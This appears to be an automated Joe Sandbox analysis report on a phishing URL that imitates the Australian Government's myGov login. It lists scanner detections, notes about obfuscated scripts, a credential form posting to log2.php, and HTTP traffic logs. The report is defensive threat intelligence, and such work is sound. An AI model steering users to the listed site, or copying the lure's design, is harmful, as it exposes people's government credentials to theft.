Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://yungbucksbbq.com/portbiz/

Overview

General Information

Sample URL:https://yungbucksbbq.com/portbiz/
Analysis ID:1580537
Infos:

Detection

HTMLPhisher
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Suricata IDS alerts for network traffic
Yara detected HtmlPhish10
AI detected suspicious Javascript
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Invalid 'copyright' link found
Invalid 'forgot password' link found
Invalid T&C link found
Suspicious form URL found

Classification

  • System is w10x64
  • chrome.exe (PID: 2260 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2344 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2204,i,10793580977582758868,3268384068697070233,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6560 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://yungbucksbbq.com/portbiz/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_79JoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    SourceRuleDescriptionAuthorStrings
    1.3.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      2.5.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-25T02:23:10.180447+010020538431Successful Credential Theft Detected104.21.112.1443192.168.2.449747TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: https://yungbucksbbq.com/portbiz/Avira URL Cloud: detection malicious, Label: phishing
        Source: https://yungbucksbbq.com/portbiz/SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
        Source: https://yungbucksbbq.com/cdn-cgi/challenge-platform/h/b/scripts/jsd/787bc399e22f/main.js?Avira URL Cloud: Label: phishing
        Source: https://yungbucksbbq.com/cdn-cgi/challenge-platform/scripts/jsd/main.jsAvira URL Cloud: Label: phishing
        Source: https://yungbucksbbq.com/cdn-cgi/challenge-platform/h/b/jsd/r/8f7506295d20727bAvira URL Cloud: Label: phishing
        Source: https://yungbucksbbq.com/portbiz/icons/blugov-left-chevron-dark.svgAvira URL Cloud: Label: phishing
        Source: https://yungbucksbbq.com/portbiz/css/mgv2-application.cssAvira URL Cloud: Label: phishing
        Source: https://yungbucksbbq.com/portbiz/css/css.cssAvira URL Cloud: Label: phishing
        Source: https://yungbucksbbq.com/portbiz/icons/icon-blugov-info.svgAvira URL Cloud: Label: phishing
        Source: https://yungbucksbbq.com/favicon.icoAvira URL Cloud: Label: phishing
        Source: https://yungbucksbbq.com/portbiz/css/blugov.cssAvira URL Cloud: Label: phishing
        Source: https://yungbucksbbq.com/portbiz/images/myGov-cobranded-logo-white.svgAvira URL Cloud: Label: phishing
        Source: https://yungbucksbbq.com/portbiz/images/myGov-cobranded-logo-black.svgAvira URL Cloud: Label: phishing

        Phishing

        barindex
        Source: https://yungbucksbbq.com/portbiz/Joe Sandbox AI: Score: 9 Reasons: The brand 'Australian Government' is well-known and typically associated with the domain 'australia.gov.au'., The URL 'yungbucksbbq.com' does not match the legitimate domain associated with the Australian Government., The domain 'yungbucksbbq.com' appears unrelated to the Australian Government and does not contain any recognizable elements of the legitimate domain., The presence of input fields for 'Username or email' and 'Password' on an unrelated domain is a common phishing tactic. DOM: 1.3.pages.csv
        Source: https://yungbucksbbq.com/portbiz/#Joe Sandbox AI: Score: 9 Reasons: The brand 'Australian Government' is well-known and typically associated with the domain 'australia.gov.au'., The URL 'yungbucksbbq.com' does not match the legitimate domain associated with the Australian Government., The URL 'yungbucksbbq.com' appears unrelated to the Australian Government and does not contain any recognizable elements of the legitimate domain., The presence of input fields for 'Username or email' and 'Password' on an unrelated domain is suspicious and indicative of a phishing attempt. DOM: 2.5.pages.csv
        Source: Yara matchFile source: 1.3.pages.csv, type: HTML
        Source: Yara matchFile source: 2.5.pages.csv, type: HTML
        Source: Yara matchFile source: dropped/chromecache_79, type: DROPPED
        Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://yungbucksbbq.com/portbiz/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load additional scripts and the obfuscation of the script's purpose raise significant security concerns. While the script may have a legitimate purpose, such as implementing a security challenge, the overall behavior is highly suspicious and poses a high risk of malicious activity.
        Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://yungbucksbbq.com/portbiz/... This script demonstrates several high-risk behaviors, including dynamic code execution via `eval()` and obfuscated code. It also sets a cookie with a long expiration date, which could be used for potential data exfiltration. The script appears to be testing for the presence of various headless browser and automation tools, suggesting it may have malicious intent. Overall, this script poses a significant security risk and should be treated with caution.
        Source: 0.4.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://yungbucksbbq.com/portbiz/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load additional scripts and the obfuscation of the script's purpose raise significant security concerns. While the script may have a legitimate purpose, such as implementing a security challenge, the overall behavior is highly suspicious and poses a high risk of malicious activity.
        Source: https://yungbucksbbq.com/portbiz/HTTP Parser: Number of links: 0
        Source: https://yungbucksbbq.com/portbiz/HTTP Parser: Base64 decoded: 1735089785.000000
        Source: https://yungbucksbbq.com/portbiz/HTTP Parser: Title: Sign in with myGov - myGov does not match URL
        Source: https://yungbucksbbq.com/portbiz/HTTP Parser: Invalid link: Copyright
        Source: https://yungbucksbbq.com/portbiz/HTTP Parser: Invalid link: Forgot password
        Source: https://yungbucksbbq.com/portbiz/HTTP Parser: Invalid link: Help
        Source: https://yungbucksbbq.com/portbiz/HTTP Parser: Invalid link: Terms of use
        Source: https://yungbucksbbq.com/portbiz/HTTP Parser: Invalid link: Privacy and security
        Source: https://yungbucksbbq.com/portbiz/HTTP Parser: Invalid link: Accessibility
        Source: https://yungbucksbbq.com/portbiz/HTTP Parser: Form action: log2.php
        Source: https://yungbucksbbq.com/portbiz/HTTP Parser: <input type="password" .../> found
        Source: https://yungbucksbbq.com/portbiz/HTTP Parser: No favicon
        Source: https://yungbucksbbq.com/portbiz/HTTP Parser: No favicon
        Source: https://yungbucksbbq.com/portbiz/HTTP Parser: No <meta name="author".. found
        Source: https://yungbucksbbq.com/portbiz/HTTP Parser: No <meta name="copyright".. found

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2053843 - Severity 1 - ET PHISHING MyGovAU Credential Phish Landing Page 2024-06-24 : 104.21.112.1:443 -> 192.168.2.4:49747
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /portbiz/ HTTP/1.1Host: yungbucksbbq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /portbiz/ HTTP/1.1Host: yungbucksbbq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://yungbucksbbq.com/portbiz/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1Host: yungbucksbbq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA
        Source: global trafficHTTP traffic detected: GET /portbiz/css/css.css HTTP/1.1Host: yungbucksbbq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://yungbucksbbq.com/portbiz/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
        Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://yungbucksbbq.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://yungbucksbbq.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://yungbucksbbq.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://yungbucksbbq.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /portbiz/css/mgv2-application.css HTTP/1.1Host: yungbucksbbq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://yungbucksbbq.com/portbiz/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
        Source: global trafficHTTP traffic detected: GET /portbiz/css/blugov.css HTTP/1.1Host: yungbucksbbq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://yungbucksbbq.com/portbiz/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
        Source: global trafficHTTP traffic detected: GET /portbiz/images/myGov-cobranded-logo-black.svg HTTP/1.1Host: yungbucksbbq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://yungbucksbbq.com/portbiz/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
        Source: global trafficHTTP traffic detected: GET /portbiz/images/myGov-cobranded-logo-white.svg HTTP/1.1Host: yungbucksbbq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://yungbucksbbq.com/portbiz/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
        Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /portbiz/icons/blugov-left-chevron-dark.svg HTTP/1.1Host: yungbucksbbq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://yungbucksbbq.com/portbiz/css/blugov.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
        Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /portbiz/images/myGov-cobranded-logo-black.svg HTTP/1.1Host: yungbucksbbq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
        Source: global trafficHTTP traffic detected: GET /portbiz/images/myGov-cobranded-logo-white.svg HTTP/1.1Host: yungbucksbbq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
